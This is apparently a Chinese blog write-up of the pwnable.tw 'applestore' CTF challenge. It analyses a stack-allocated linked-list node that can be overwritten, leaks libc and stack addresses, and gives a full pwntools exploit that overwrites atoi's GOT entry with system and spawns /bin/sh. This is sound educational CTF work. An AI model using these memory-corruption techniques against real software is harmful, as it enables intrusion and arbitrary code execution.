pwnable.tw applestore 经验总结

最新推荐文章于 2023-09-25 15:43:22 发布
最新推荐文章于 2023-09-25 15:43:22 发布
阅读量842 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/102850665
版权

做了这题后对栈的理解又加深了一点

程序保护:
在这里插入图片描述
程序逻辑分析:
在这里插入图片描述
1.Apple store
列出apple store 的商品
2.add
通过创建一个size为0x20 的chunk来存放需要购买的商品的数据
具体结构如下:

str addr <----- &chunk
price
next addr
before addr

创建完毕后插入以mycart为头节点的双向链表中

3. Cart
通过遍历链表来输出购物车中的商品的信息, 并返回购物车中的商品的总价格

4.checkout
在这里插入图片描述
同样会遍历链表来输出商品的信息, 不过在商品总价格为7174时会加入iphone 8, 存放iphone 8 的信息没有存放在堆中, 而是存放在栈中, 也就是v2 的地址(ebp - 0x20)
存放信息的结构如下:

str addr <----- ebp - 20h
price
unknown(insert时未赋值
before addr

漏洞点:
在这里插入图片描述
漏洞点也就存在于存放iphone 8 的结构中
add, delete, cart, checkout 这些函数都是从handler函数中调用的, 所以进入这些函数时栈帧中的ebp 都是一样的, 那么只要关注有哪些可控制的变量在ebp - 0x20附近即可控制iphone 8 的结构
在这里插入图片描述通过观察在add, delete, cart函数中都存在处于ebp - 0x20附近的变量, 并且输入的数据长度可以覆盖iphone 8 的结构体

漏洞利用:

1.首先要做的第一步就是泄露libc地址,
在这里插入图片描述
cart函数会输出所有商品的信息, 在此之前先通过控制商品的总价格为7174(6 * 199 + 20 * 199), 可以将指向iphone 8 结构的栈地址插入链表中
之后在输入buf的数据时控制iphone 8 的str addratoi函数got表地址即可泄露出atoi 的libc地址

2.泄露出libc地址后考虑如何调用system函数
观察本题开启的保护, 比较直接的想法是覆写got表

想过通过delete函数控制iphone 8的结构中的next addr为system_addr, before_addr 为got_atoi - 8, 的确可以将got_atoi 里的地址覆盖成system函数的地址, 不过之后往system函数的代码中写就不行了, 代码段不可写, 会触发段保护, 退一万步, 即使可写, system函数的代码也被破坏, 同样无法成功调用system函数

想了挺久, 没办法, 去参考别人的想法, 发现可以通过libc中的environ来泄露栈地址, 泄露了栈地址后通过调试算出偏移可以得到delete函数的ebp地址,delete函数中的ebp指向的是handler函数中的ebp
ebp -> handler_ebp

可以通过改写handler_ebp 为got_atoi + 0x22来完成对got表的覆写
为什么是got_atoi + 0x22?
在这里插入图片描述
从delete函数返回到handler函数中, 还原栈帧的过程中ebp 的值为改写成got_atoi - 0x22, 这样在调用my_read 函数中时可以对got_atoi 进行覆写, 改写了got表后要考虑的就是/bin/sh 的位置, 可以看到atoi 的参数就是刚刚输入的数据, 这时可以输入p32(system) + "|| /bin/sh"或 p32(system) + “;/bin/sh” 来绕过system 调用/bin/sh

EXP:

from pwn import *
import struct

context(arch='i386', os='linux', log_level='debug')
debug = 1
d = 1

if debug == 0:
	p = process("./applestore")
	if d == 1:
		context.terminal = ['tmux', 'splitw', '-h']
		gdb.attach(p)
else:
	p = remote("chall.pwnable.tw", 10104)

def add(num):
	p.sendlineafter("> ", str(2))
	p.sendlineafter("Device Number> ", str(num))

def delete(ans):
	p.sendlineafter("> ", str(3))
	p.sendlineafter("Item Number> ", ans)

def cart(ans):
	p.sendlineafter("> ", str(4))
	p.sendlineafter("Let me check your cart. ok? (y/n) > ", ans)

def checkout(ans):
	p.sendlineafter("> ", str(5))
	p.sendlineafter("Let me check your cart. ok? (y/n) > ", ans)

for i in range(6):
	add(1)

for i in range(20):
	add(2)

checkout('y')

elf = ELF("./applestore")
libc = ELF("as_libc_32.so.6")
#libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")

got_atoi = elf.got['atoi']
print "got_atoi -> " + hex(got_atoi)

payload = 'ya' + p32(got_atoi) + 'a'*(0xa - 2 - 4) + p32(0)
cart(payload)

p.recvuntil("27: ")
libc_addr = u32(p.recv(4))
libc_base = libc_addr - libc.symbols['atoi']
system = libc_base + libc.symbols['system']
environ_libc = libc_base + libc.symbols['environ']
print "environ_libc -> " + hex(environ_libc)
print "libc_addr -> " + hex(libc_addr)
print "libc_base -> " + hex(libc_base)
print "system -> " + hex(system)

payload = 'ya' + p32(environ_libc) + 'a'*(0xa - 2 - 4) + p32(0)
cart(payload)

p.recvuntil("27: ")
stack = u32(p.recv(4))
print "stack -> " + hex(stack)

raw_input()
payload = '27' + p32(stack) + p32(0x12345678)
payload += p32(got_atoi + 0x22) + p32(stack - 0x100 - 0xc)
#payload += p32(got_atoi + 0x22) + p32(stack - (0xff80fa1c - 0xff80f918) - 8)
delete(payload)

p.sendlineafter("> ", p32(system) + "||/bin/sh")

p.interactive()

结果:
在这里插入图片描述

学到的其它知识点:

atoi 函数只会转化ascii码处于0x30-0x39 的字符

苍崎青子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
TW6.1.5.8-Enterprise-Linux
08-31
TW6.1.5.8_Enterprise_Linux TongHttpServer(THS)是一款功能强大、稳定高效、高性价比、易于使用、便于维护的负载均衡软件产品。THS 不仅可以满足用户对负载均衡服务的需求,提升系统可靠性、高效性、可扩展性及...
pwnable.twapplestore
weixin_30642869的博客
09-14 92
做到这道题的时候正赶上iPhone 8上市,撒花~(虽然不知道为啥) 程序分析: 先进到main函数,比较简单。 myCart位于bss段上,是一个长度为0x10。 主要的处理函数是handler函数: 这是一个标准的菜单类题目。挨个函数看下去 list: 这个是各种手机的价格,什么都没有。 再看第二个函数: 这个函数是一个添加购物车的函数,具体采用...
ciscn_final_4(反调试+在栈上伪造堆chunk)
seaaseesa的博客
04-30 1117
ciscn_final_4 首先,检查一下程序的保护机制,没开PIE 沙箱禁用了execve,因此不能getshell,只能构造ROP来读取flag 然后,我们用IDA分析一下 Delete功能没有清空堆指针,存在UAF可以造成double free new功能可以自由控制大小 程序一开始,我们可以在栈里输入一些数据,因此,我们可以在栈里伪造一个chunk,然后利用fa...
environ泄露栈地址+orw+uaf
FUCKING12的博客
10-08 604
这个题开了沙箱,有uaf。利用思路:借助environ泄露栈地址,利用uaf将orw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
pwnable.tw applestore
weixin_30861459的博客
06-05 180
I is so vegetable:(,我tcl又由于忙于毕设和各种比赛各种耽误,到今天才真正把这题搞出来 存储结构 0x804B070链表头 struct _mycart_binlist { int *name; //ebp-0x20 int price; //ebp-0x1c struct _mycart_binlist *next...
pwnable.tw记录之applestore
qq_35429581的博客
10-31 1412
耐下心用ida分析: 主要功能函数handler: create函数malloc一块16字节的内存,分别存放:char* name,int price,struct * bk ,struct * fd   ,由insert()函数将当前商品的结构体插入链表尾部。链表的起始位置记录在全局变量 myCart(0x0804B068)中。 delete函数进行链表的拆卸: 一开始觉
MP4播放器_mp4播放器_player_mp4_mp4ba.tw_
10-03
【标题】"MP4播放器_mp4播放器_player_mp4_mp4ba.tw_" 指的是一个专注于播放MP4格式视频文件的播放器。在数字媒体领域,MP4是一种广泛使用的视频编码格式,它能够有效地压缩视频数据,同时保持较高的画质。MP4播放器...
Assassins.Creed.III.TW.THETA.RIP.torrent
07-20
Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME....
rate.bot.com.tw:台湾银行黄金价格抓取程式
06-11
台湾银行黄金价格抓取程式 序 此程式以语言撰写,以日期为参数抓取台湾银行。... GET http://rate.bot.com.tw/Pages/UIP005/UIP00511.aspx?whom=GB0030001000&afterOrNot=0&curcd=TWD&date=20000101 只需变换date参数。
28365365.tw_11个单页源码.rar
10-07
标题中的"28365365.tw_11个单页源码.rar"表明这是一个包含11个单页网站源代码的压缩文件,主要用于28365365.tw这个域名的相关网页设计。单页源码是指只有一屏或者滚动浏览到底的网页设计,这种设计通常用于简洁明了...
pwnable.tw - start
不急不躁
07-08 4138
首先安装 pwntools,在执行pip install --upgrade pwntools时出错 cannot import name main 要修改 /usr/bin/pip from pip import main 为 from pip import __main__ sys.exit(__main__._main()) 再次执行即可 安装 peda git cl...
pwnable.tw---start
杀生丸?不,其实我要的是桔梗
04-30 1528
Pwnable.tw—start 最近比赛玩了好几天的pwn,发现老是差点火候,开始正式刷刷Pwnable.tw看看。 题目分析: checksec : 第一次遇到什么防护都不开的程序,兴奋。 IDA: 题目只有start和exit。 检测栈有点问题,不能够F5,强行看汇编。。。 .text:08048060 public _start ....
pwnable.twapplestore
最新发布
qq_61670993的博客
09-25 86
非常有意思的一个题目,一定要做一做哦
pwnable.tw】 alive_note
weixin_30716725的博客
12-06 151
突然发现已经两个月没写过WP了,愧疚- -... 此题也算一道分数很高的题目,主要考察Shellcode的编写。 又是一道题目逻辑很简单的题。 首先提供了三个函数 查看,删除,添加 查看函数: 此函数中readint()使用atoi进行解析,没有检查小于0的情况,造成越解读,可以泄露libc地址(然并卵) 添加函数中一样有这个问题,并且可以任意写, 显然是一道覆盖got...
twapplestore
weixin_43960998的博客
02-18 210
程序 这道题学到很多东西,针不戳! 程序刚拿到手看起来很乱,需要静下心来分析。 首先看 add 功能: 对应每一个机型都会先 create 在堆中开辟一块空间存放相应信息: 先存了指向 iPhone 机名的字符串的地址,v3[1] 存放了这个机型的价格,v3[2] 和 v3[3] 暂时不知道是干什么的先留着。 然后还会进行一个 insert 操作 : 这乍一看也有点懵,大概是遍历以 myCart 为头节点的链表 ,当第一次 add 的时候 myCart[2] 即为存放第一个 iPhone 信息的堆块地
pwnable.tw applestore 分析
weixin_30908707的博客
03-17 107
此题第一步凑齐7174进入漏洞地点 然后可以把iphone8的结构体中的地址通过read修改为一个.got表地址,这样就能把libc中该函数地址打出来。这是因为read函数并不会在遇到\x00时截断(就是在read字符'y'的时候)。 然后还可以采用同样的办法把libc中的libc.symbols['environ']打出来,这个值存储着当前栈中环境变量所在的位置,因而可以得到栈的位置。...
App跳转AppleStore的问题
守候可爱多的博客
11-18 928
这段时间有空就写些东西分享一下:关于APP更新提示跳转AppleStore的问题。说明:在项目的不同需求下有两种情况, 1.需要跳出APP到AppleStore详情页下载; 2.在APP内(不跳出APP)到AppleStore详情页下载; 图1.开发中常用的app更新功能,这个的和后台配合(PS:在提交APP到AppleStore审核的时候不能出现这个界面,不然一定被拒,切忌…) 图2.是跳
APP Store案例数据分析
IT之一小佬的博客
01-02 2456
1. 数据清洗 示例代码: import pandas as pd # 读取数据 app = pd.read_csv('../data/excel_data/applestore.csv') app.info() #发现了unname 0这个奇怪的变量,需要进行清理 app.drop('Unnamed: 0', axis=1, inplace=True) #drop默认是对行 #inplace表示直接替换掉原有数据 #同样可以用位置来举 #app.drop(app.columns[
ART异常处理机制(1) - SIGSEGV信号的拦截和处理
大将军王虎剩的专栏
11-14 8986
主要讲述 Android ART虚拟机的异常处理,StackOverflowError的检测和抛出原理,NullPointerException的检测和抛出原理等。
net.ipv4.tcp_tw_recycle
03-16
net.ipv4.tcp_tw_recycle是 Linux 下用于重用 TIME_WAIT 状态的套接字,可以设置为 0 或 1,其中 0 表示禁用,1 表示启用。net.ipv4.tcp_tw_recycle是一个Linux内核参数,用于控制TCP连接的回收行为。如果该参数被...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值